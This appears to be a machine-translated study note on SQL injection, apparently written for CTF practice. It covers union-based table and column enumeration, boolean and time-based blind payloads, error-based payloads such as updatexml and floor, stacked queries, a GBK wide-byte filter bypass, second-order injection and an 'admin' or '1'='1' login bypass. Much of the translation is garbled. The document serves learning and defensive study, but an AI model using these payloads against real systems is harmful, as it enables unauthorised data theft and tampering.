SQL Injection detailed summary

notes ： Chicken notes , Reference as appropriate , Welcome to correct

SQL Principle of injection

When the filtering of user incoming data is not strict , The user can be in Web Form submission or Enter the domain name or ` The query submitted at the page request SQL sentence , Pass these query statements to the back-end data execution , Thus, the actual executed statement is different from the expected statement , Cause the original information of the database to leak , Tampering , Even delete .

sql keyword

• information_schema.tables Store the correspondence between table name and database name
• information_schema.columns Store the correspondence between field name and table name

notes : information_schema.tables In fact, it is selected information_schema In the library tables surface

step

One , Find the injection point

In the place where parameters will be submitted, if you pass sql After the statement , An error message will appear , It means that SQL sentence , Prove that this is the injection point

？id=1 or 1=1
？id=1 or 1=2

Two , Determine the field length

Determine the number of fields queried —— order by

' order by =n     //1,2, 3, 4 ..... n When reporting a mistake , That there is n-1 A field 

3、 ... and , Judge the display bit

Using federated queries （union select） To determine the display bit

union select 1,2,3,4,5,6,7…… // Numbers indicate the number of fields 

Four , Look up the database name

union select 1,2,database()

5、 ... and , Look up the name of the table

union select 1,2,table_name from information_schema.tables where 
table_schema=database() 

6、 ... and , Look up the list name

union select 1,2,column_name from information_schema.columns where 
table_name=' Table name ' and table_schema=database() 

7、 ... and , Check the field value

union select 1, Field name , Field name  from  Table name 

Injection point

1,cookie Inject ： The injection point is cookie, adopt bp After grabbing the bag, you can cookie Submitted by

2,UA Inject (user agent)： The injection point is user-agent It's about , adopt bp stay UA Submit at

3,refer Inject ： The injection point is refer It's about

HTTP Referer yes header Part of , When the browser to web When the server sends the request , Usually with Referer, Tell the server which page is linked from , The server can therefore obtain some information for processing . The meaning of this sentence is , Only when you send a request to the browser , To bring with you referer

## Joint injection

Joint injection has characteristics **： The reason for using federated injection to write into the database ？**
answer ： When using combined injection , If the data you query does not exist , Then a message with the content of null Virtual data , in other words ** When federating data that does not exist , The federated query will construct a virtual data .** So at this time, we can add the information we need during injection to achieve our purpose .

Reference resources ：https://buuoj.cn/challenges#[GXYCTF2019]BabySQli

## Blind note

### Bull's blind note

• Boolean has obvious True Follow Flase, In other words, it will return according to your injected information Ture Follow Flase, There will be no previous error information .

### Time blind note

• There is only one return value of the page Ture, Regardless of the input recognition value , The return situation will be handled as normal . Add a specific time function , Judge whether the query statement is correct according to the return time of the page

The difference between Buer blind injection and time blind injection is , Boolean blind injection determines whether the injection statement is correct by the information returned from the page , Time blind annotation is judged by the return time of the page

### Blind functions are commonly used

• length() function Returns the length of the string
• substr() Intercepting string （ grammar :SUBSTR(str,pos,len);）
• scii() Return character's ascii code [ Change characters into numbers wei]
• sleep() Hang the program for a while n by n second
• if(expr1,expr2,expr3) Judgment statement If the first statement is correct, execute the second statement. If the third statement is incorrect

Injection statement comparison

and (length(database()))>1    // Bull's blind note 
and if(ascii(substr(database(),1,1))>1,0,sleep(5))   // Time blind note 

An error injection

Incoming sql The statement will echo through the error message , This method can be used when there is no echo bit

xpath Grammatical errors

• **Updatexml() **: to update XML file

and updatexml(1,concat(0x7e,(select database()),0x7e),1)
//updatexml( The goal is xml Content ,xml Document path , Updated content )
//0x7e：16 Base number , Express ~

By updating the xml Method of documentation , stay xml Write a query statement at the location of the document path

• extractvalue() ： Inquire about xml Values in the document

and extractvalue(1,concat(0x7e,(SELECT database()),0x7e))
//extractvalue( Query target xml Content ,xpath Format string )

In general, it's cooperation and Or is it or The use of , He is different from joint inquiry , Don't care about the number of fields .

exp Report errors

notes ： Such problems have not been solved yet , The details are not very clear

exp It's a mathematical function take e Of x Power , When we enter a value greater than 709 You're going to report a mistake Then take the opposite value, which will always be greater than 709 So wrong reporting , Applicable version ：5.5.5,5.5.49, and mysql Recordable double The numerical range is limited , Once the result exceeds the range , Then the function reports an error ,~ The symbol is the operator , It means unary character inversion .

exp(~(select * from( Query statement )a))

union select exp(~(select * from(select database())a))

Nesting must be used here , Because without nesting select*from Cannot overflow large integer

floor() Report errors

floor() The reason for error injection is group by When inserting data into a temporary table , because rand() Multiple calculations lead to duplicate primary keys when inserting temporary tables , To report a mistake , And because before the error report concat() Medium SQL A statement or function is executed , Therefore, the statement reports an error and the thrown primary key is SQL The result of the execution of a statement or function .

mysql> select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2));
ERROR 1062 (23000): Duplicate entry '5.5.54-log1' for key 'group_key'

mysql> select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry '5.5.54-log1' for key 'group_key'

mysql> select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a;
ERROR 1062 (23000): Duplicate entry '5.5.54-log1' for key 'group_key'

Stack Injection

Stack Injection , seeing the name of a thing one thinks of its function , Is to stack statements together for query
The principle is simple ,mysql_multi_query() Support multiple sql sentence At the same time , That's it. ; Separate , Piles of execution sql sentence ,

 select * from users;show databases; 

Limitations of Stack Injection : The point is that not every environment can be implemented , May be affected by API Or restrictions not supported by the database engine , Of course, insufficient permissions can also explain why attackers can't modify data or call some programs .

Wide byte Injection

principle ：MySQL In the use of GBK When coding , I think two characters are a Chinese character , for example %aa%5c It's just one. Chinese characters .

Filter ’ The idea that is often used is to ’ Convert to \’

1,%df**’

urlencode(’) = %5c%27, So bypass the filter , Can be in %5c%27 Add %df, Turn into %df%5c%27,mysql stay GBK When coding ,%df%5c It will be parsed into a Chinese character ,%27 As a separate ’ Left outside , To bypass the filter

2, take \' Medium \ To filter out

For example, we can construct %5c%5c%27 The situation of , hinder %5c It will be %5c Comment out . This is also bypass One way .

Easy to produce wide bytes php function ：

replace()

addslaches()： Returns adding a backslash before a predefined character （\） String . Predefined characters ：', " , \ . Use idea one  （ Defend against this vulnerability , To put  mysql_query  Set to  binary  The way ） mysql_real_escape_string()： Escape the following characters ： \x00 \n \r \ ’ " \x1a

The secondary injection

Hackers carefully construct SQL Statement into the database , The information reported by the database is rejected by other types SQL The attack behavior is triggered when the statement is called . Because the first time a hacker inserted into the database, it did not trigger harm , Instead, the attack will be triggered when other statements are called , This is the second injection .

UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass'

​ Single quotation marks are directly used here username So when username Controllable words , Here is the existence SQL Injected , Suppose the user registers username The value of is ：admin'#, Then the complete statement at this time is ：sql

UPDATE users SET PASSWORD='$pass' where username='admin'# and password='$curr_pass'

At this point, the semantics are completely changed , It was directly modified admin User's password .

Common query functions

Common query functions
① version() – Database version
② user() – Database users
③ database() – Current database
④ current_user() – Current user name
⑤ system_user() – System user name
⑥ session_user() – User name to connect to the database
⑦ @@basedir – Database installation directory
⑧ @@datadir – Database file storage directory

Small problems in question

1, Universal password ：?username=admin’ or ‘1’='1# &password=1

2, limit 1.1： The second statement that displays the query results “ limit1.1 ” Is a condition , The function is to get the query result 1 A record after the result ,,

3,mysql in , When the data types on both sides of the equal sign are inconsistent, a cast will occur . When comparing strings with numbers , Character transfers are forcibly converted to numbers , Comparing eg： character string 1 Equal to the number , character string 1a Will be converted to 1, And 1 equal , And characters a Be coerced into 0 namely ‘a’=0 This method can be used to determine whether it is character type

4, If the two parameters compare , There is at least one NULL, The result is NULL, In addition to using NULL<=>NULL Returns the 1, No type conversion .

Both parameters are strings , Compare by string , No type conversion .

Both arguments are integers , Compare by integer , No type conversion .

If you don't compare with numbers , Then the hexadecimal value is treated as a binary string .

One parameter is decimal type , If the other parameter is decimal Or an integer , Will convert integers to decimal Then compare , If the other parameter is a floating-point number , It will put decimal Convert to floating point for comparison

In all other cases , Both parameters are converted to floating-point numbers for comparison .

5,sql Functions that may be used in statements

mid()--- Extract characters from text fields 
limit()--- Return the first or middle rows of data 
concat、concat_ws、group_concat
MySQL Of concat Function when connecting strings , As long as one of them is NULL, Then it will return to NULL
group_concat([DISTINCT]  Fields to connect  [Order BY ASC/DESC  Sort field ] [Separator ' Separator '])
rand random number （ produce 0,1 Between random numbers ）
right(),left()  // This function can be used when the length of read data is limited 

Reference article

SQL Injection principle and analysis (seebug.org)

SQL A detailed summary of injection usage （ From shallow to deep , Ongoing update )